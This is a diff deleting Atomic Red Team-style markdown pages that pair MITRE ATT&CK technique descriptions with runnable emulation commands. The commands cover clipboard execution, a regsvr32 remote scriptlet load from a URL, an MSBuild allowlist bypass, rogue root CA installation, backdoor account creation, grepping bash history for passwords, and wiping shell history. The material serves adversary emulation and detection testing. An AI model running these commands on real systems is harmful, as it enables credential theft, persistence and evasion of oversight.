Detection: Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)
|
||||
|
||||
- [Atomic Test #2 - PowerShell](#atomic-test-2---powershell)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Utilize Clipboard to store or execute commands from
|
||||
Add data to clipboard to copy off or execute commands from.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
dir | clip
|
||||
clip < readme.txt
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - PowerShell
|
||||
Utilize PowerShell to echo a command to clipboard and execute it
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `powershell`!
|
||||
```
|
||||
echo Get-Process | clip
|
||||
Get-Clipboard | iex
|
||||
```
|
||||
<br/>
|
||||
@@ -1,87 +0,0 @@
|
||||
# T1117 - Regsvr32
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1117)
|
||||
<blockquote>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)
|
||||
|
||||
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
|
||||
|
||||
Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: SubTee Regsvr32 Whitelisting Bypass) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
|
||||
|
||||
Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking. (Citation: Carbon Black Squiblydoo Apr 2016)
|
||||
|
||||
Detection: Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Data Sources: Loaded DLLs, Process monitoring, Process command-line parameters, Windows Registry
|
||||
|
||||
Defense Bypassed: Process whitelisting, Anti-virus
|
||||
|
||||
Permissions Required: User, Administrator
|
||||
|
||||
Remote Support: No
|
||||
|
||||
Contributors: Casey Smith</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Regsvr32 local COM scriptlet execution](#atomic-test-1---regsvr32-local-com-scriptlet-execution)
|
||||
|
||||
- [Atomic Test #2 - Regsvr32 remote COM scriptlet execution](#atomic-test-2---regsvr32-remote-com-scriptlet-execution)
|
||||
|
||||
- [Atomic Test #3 - Regsvr32 local DLL execution](#atomic-test-3---regsvr32-local-dll-execution)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Regsvr32 local COM scriptlet execution
|
||||
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| filename | Name of the local file, include path. | Path | Regsvr32.sct|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
regsvr32.exe /s /u /i:#{filename} scrobj.dll
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
|
||||
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| url | URL to hosted sct file | Url | http://www.example.com/file.sct|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
regsvr32.exe /s /u /i:#{url} scrobj.dll
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Regsvr32 local DLL execution
|
||||
Regsvr32.exe is a command-line program used to register and unregister OLE controls
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | payload.dll|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
regsvr32.exe #{dll_name}
|
||||
```
|
||||
<br/>
|
||||
@@ -1,55 +0,0 @@
|
||||
# T1123 - Audio Capture
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1123)
|
||||
<blockquote>An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
|
||||
|
||||
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
|
||||
|
||||
Detection: Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
|
||||
|
||||
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: API monitoring, Process monitoring, File monitoring
|
||||
|
||||
Permissions Required: User</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - SourceRecorder via Windows command prompt](#atomic-test-1---sourcerecorder-via-windows-command-prompt)
|
||||
|
||||
- [Atomic Test #2 - PowerShell Cmdlet via Windows command prompt](#atomic-test-2---powershell-cmdlet-via-windows-command-prompt)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - SourceRecorder via Windows command prompt
|
||||
Create a file called test.wma, with the duration of 30 seconds
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| output_file | Path to the recording file being captured | Path | test.wma|
|
||||
| duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt
|
||||
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
|
||||
```
|
||||
<br/>
|
||||
@@ -1,79 +0,0 @@
|
||||
# T1127 - Trusted Developer Utilities
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1127)
|
||||
<blockquote>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.
|
||||
|
||||
===MSBuild===
|
||||
|
||||
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations. (Citation: MSDN MSBuild)
|
||||
|
||||
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file. (Citation: MSDN MSBuild) Inline Tasks MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution. (Citation: SubTee GitHub All The Things Application Whitelisting Bypass)
|
||||
|
||||
===DNX===
|
||||
|
||||
The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016. (Citation: Microsoft Migrating from DNX) DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft.
|
||||
|
||||
An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX. (Citation: engima0x3 DNX Bypass)
|
||||
|
||||
===RCSI===
|
||||
|
||||
The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution. (Citation: Microsoft Roslyn CPT RCSI) The rcsi.exe binary is signed by Microsoft. (Citation: engima0x3 RCSI Bypass)
|
||||
|
||||
C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe. (Citation: engima0x3 RCSI Bypass)
|
||||
|
||||
===WinDbg/CDB===
|
||||
|
||||
WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools. (Citation: Microsoft Debugging Tools for Windows) They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.
|
||||
|
||||
An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities. (Citation: Exploit Monday WinDbg)
|
||||
|
||||
It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
|
||||
|
||||
===Tracker===
|
||||
|
||||
The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system. (Citation: Microsoft Docs File Tracking)
|
||||
|
||||
An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. (Citation: Twitter SubTee Tracker.exe)
|
||||
|
||||
Detection: The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
|
||||
|
||||
Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.
|
||||
|
||||
Platforms: Windows
|
||||
|
||||
Data Sources: Process monitoring
|
||||
|
||||
Defense Bypassed: Application whitelisting
|
||||
|
||||
Permissions Required: User
|
||||
|
||||
System Requirements: MSBuild: .NET Framework version 4 or higher
|
||||
DNX: .NET 4.5.2, Powershell 4.0
|
||||
RCSI: .NET 4.5 or later, Visual Studio 2012
|
||||
|
||||
Remote Support: No
|
||||
|
||||
Contributors: Casey Smith, Matthew Demaske, Adaptforward</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks
|
||||
Executes the code in a project file using. C# Example
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| filename | Location of the project file | Path | T1127.csproj|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe T1127.csproj
|
||||
```
|
||||
<br/>
|
||||
@@ -1,61 +0,0 @@
|
||||
# T1130 - Install Root Certificate
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1130)
|
||||
<blockquote>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
|
||||
|
||||
Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)
|
||||
|
||||
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)
|
||||
|
||||
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)
|
||||
|
||||
In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)
|
||||
|
||||
Detection: A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (<code>sigcheck[64].exe -tuv</code>) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
|
||||
|
||||
Installed root certificates are located in the Registry under <code>HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\</code> and <code>[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\</code>. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
|
||||
*18F7C1FCC3090203FD5BAA2F861A754976C8DD25
|
||||
*245C97DF7514E7CF2DF8BE72AE957B9E04741E85
|
||||
*3B1EFD3A66EA28B16697394703A72CA340A05BD5
|
||||
*7F88CD7223F3C813818C994614A89C99FA3B5247
|
||||
*8F43288AD272F3103B6FB1428485EA3014C0BCFE
|
||||
*A43489159A520F0D93D032CCAF37E7FE20A8B419
|
||||
*BE36A4562FB2EE05DBB3D32323ADF445084ED656
|
||||
*CDD4EEAE6000AC7F40C3802C171E30148030C072
|
||||
|
||||
Platforms: Linux, Windows, macOS
|
||||
|
||||
Data Sources: SSL/TLS inspection, Digital Certificate Logs
|
||||
|
||||
Defense Bypassed: Digital Certificate Validation
|
||||
|
||||
Permissions Required: Administrator, User
|
||||
|
||||
Contributors: Itzik Kotler, SafeBreach, Travis Smith, Tripwire, Red Canary, Matt Graeber, @mattifestation, SpecterOps</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Install root CA on CentOS/RHEL](#atomic-test-1---install-root-ca-on-centosrhel)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Install root CA on CentOS/RHEL
|
||||
Creates a root CA with openssl
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
openssl genrsa -out #{key_filename} 4096
|
||||
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
|
||||
|
||||
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
|
||||
then
|
||||
cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt
|
||||
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ];
|
||||
cp rootCA.crt /etc/pki/ca-trust/source/anchors/
|
||||
update-ca-trust
|
||||
fi
|
||||
```
|
||||
<br/>
|
||||
@@ -1,58 +0,0 @@
|
||||
# T1136 - Create Account
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1136)
|
||||
<blockquote>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
|
||||
|
||||
The <code>net user</code> commands can be used to create a local or domain account.
|
||||
|
||||
Detection: Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: Process Monitoring, Process command-line parameters, Authentication logs, Windows event logs
|
||||
|
||||
Permissions Required: Administrator</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Create a user account on a Linux system](#atomic-test-1---create-a-user-account-on-a-linux-system)
|
||||
|
||||
- [Atomic Test #2 - Create a user account on a MacOS system](#atomic-test-2---create-a-user-account-on-a-macos-system)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Create a user account on a Linux system
|
||||
Create a user via useradd
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| username | Username of the user to create | String | evil_user|
|
||||
| comment | Comment to record when creating the user | String | Evil Account|
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Create a user account on a MacOS system
|
||||
Creates a user on a MacOS system with dscl
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
#### Run it with `bash`!
|
||||
```
|
||||
dscl . -create /Users/#{username}
|
||||
dscl . -create /Users/#{username} UserShell /bin/bash
|
||||
dscl . -create /Users/#{username} RealName "#{realname}"
|
||||
dscl . -create /Users/#{username} UniqueID "1010"
|
||||
dscl . -create /Users/#{username} PrimaryGroupID 80
|
||||
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
|
||||
```
|
||||
<br/>
|
||||
@@ -1,37 +0,0 @@
|
||||
# T1139 - Bash History
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1139)
|
||||
<blockquote>Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
|
||||
|
||||
Detection: Monitoring when the user's <code>.bash_history</code> is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
|
||||
|
||||
Platforms: Linux, macOS
|
||||
|
||||
Data Sources: File monitoring, Process monitoring, Process command-line parameters
|
||||
|
||||
Permissions Required: User</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - xxxx
|
||||
xxxx
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history|
|
||||
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
|
||||
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
|
||||
```
|
||||
<br/>
|
||||
@@ -1,109 +0,0 @@
|
||||
# T1146 - Clear Command History
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1146)
|
||||
<blockquote>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.
|
||||
|
||||
Detection: User authentication, especially via remote terminal services like SSH, without new entries in that user's <code>~/.bash_history</code> is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the <code>~/.bash_history</code> file are indicators of suspicious activity.
|
||||
|
||||
Platforms: Linux, macOS
|
||||
|
||||
Data Sources: Authentication logs, File monitoring
|
||||
|
||||
Defense Bypassed: Log analysis, Host forensic analysis
|
||||
|
||||
Permissions Required: User</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Clear Bash history (rm)](#atomic-test-1---clear-bash-history-rm)
|
||||
|
||||
- [Atomic Test #2 - Clear Bash history (echo)](#atomic-test-2---clear-bash-history-echo)
|
||||
|
||||
- [Atomic Test #3 - Clear Bash history (cat dev/null)](#atomic-test-3---clear-bash-history-cat-devnull)
|
||||
|
||||
- [Atomic Test #4 - Clear Bash history (ln dev/null)](#atomic-test-4---clear-bash-history-ln-devnull)
|
||||
|
||||
- [Atomic Test #5 - Clear Bash history (truncate)](#atomic-test-5---clear-bash-history-truncate)
|
||||
|
||||
- [Atomic Test #6 - Clear history of a bunch of shells](#atomic-test-6---clear-history-of-a-bunch-of-shells)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Clear Bash history (rm)
|
||||
Clears bash history via rm
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
rm ~/.bash_history
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Clear Bash history (echo)
|
||||
Clears bash history via rm
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
echo "" > ~/.bash_history
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Clear Bash history (cat dev/null)
|
||||
Clears bash history via cat /dev/null
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
cat /dev/null > ~/.bash_history
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - Clear Bash history (ln dev/null)
|
||||
Clears bash history via a symlink to /dev/null
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
ln -sf /dev/null ~/.bash_history
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Clear Bash history (truncate)
|
||||
Clears bash history via truncate
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
truncate -s0 ~/.bash_history
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - Clear history of a bunch of shells
|
||||
Clears the history of a bunch of different shell types by setting the history size to zero
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
unset HISTFILE
|
||||
export HISTFILESIZE=0
|
||||
history -c
|
||||
```
|
||||
<br/>
|
||||
@@ -1,38 +0,0 @@
|
||||
# T1146 - Clear Command History
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1146)
|
||||
<blockquote>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.
|
||||
|
||||
Detection: User authentication, especially via remote terminal services like SSH, without new entries in that user's <code>~/.bash_history</code> is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the <code>~/.bash_history</code> file are indicators of suspicious activity.
|
||||
|
||||
Platforms: Linux, macOS
|
||||
|
||||
Data Sources: Authentication logs, File monitoring
|
||||
|
||||
Defense Bypassed: Log analysis, Host forensic analysis
|
||||
|
||||
Permissions Required: User</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Disable history collection](#atomic-test-1---disable-history-collection)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Disable history collection
|
||||
Disables history collection in shells
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Inputs
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| evil_command | Command to run after shell history collection is disabled | String | whoami|
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
export HISTCONTROL=ignoreboth
|
||||
ls #{evil_command}
|
||||
```
|
||||
<br/>
|
||||
@@ -1,48 +0,0 @@
|
||||
# T1158 - Hidden Files and Directories
|
||||
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1158)
|
||||
<blockquote>To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
|
||||
|
||||
===Windows===
|
||||
|
||||
Users can mark specific files as hidden by using the attrib.exe binary. Simply do <code>attrib +h filename</code> to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.
|
||||
|
||||
===Linux/Mac===
|
||||
|
||||
Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: <code>defaults write com.apple.finder AppleShowAllFiles YES</code>, and then relaunch the Finder Application.
|
||||
|
||||
===Mac===
|
||||
|
||||
Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
|
||||
Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
|
||||
|
||||
Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.
|
||||
|
||||
Detection: Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.
|
||||
|
||||
Platforms: Linux, macOS, Windows
|
||||
|
||||
Data Sources: File monitoring, Process Monitoring, Process command-line parameters
|
||||
|
||||
Defense Bypassed: Host forensic analysis
|
||||
|
||||
Permissions Required: User</blockquote>
|
||||
|
||||
## Atomic Tests
|
||||
|
||||
- [Atomic Test #1 - Create a hidden file in a hidden directory](#atomic-test-1---create-a-hidden-file-in-a-hidden-directory)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
## Atomic Test #1 - Create a hidden file in a hidden directory
|
||||
Creates a hidden file inside a hidden directory
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
#### Run it with `sh`!
|
||||
```
|
||||
mkdir .hidden-directory
|
||||
echo "this file is hidden" > .hidden-directory/.hidden-file
|
||||
```
|
||||
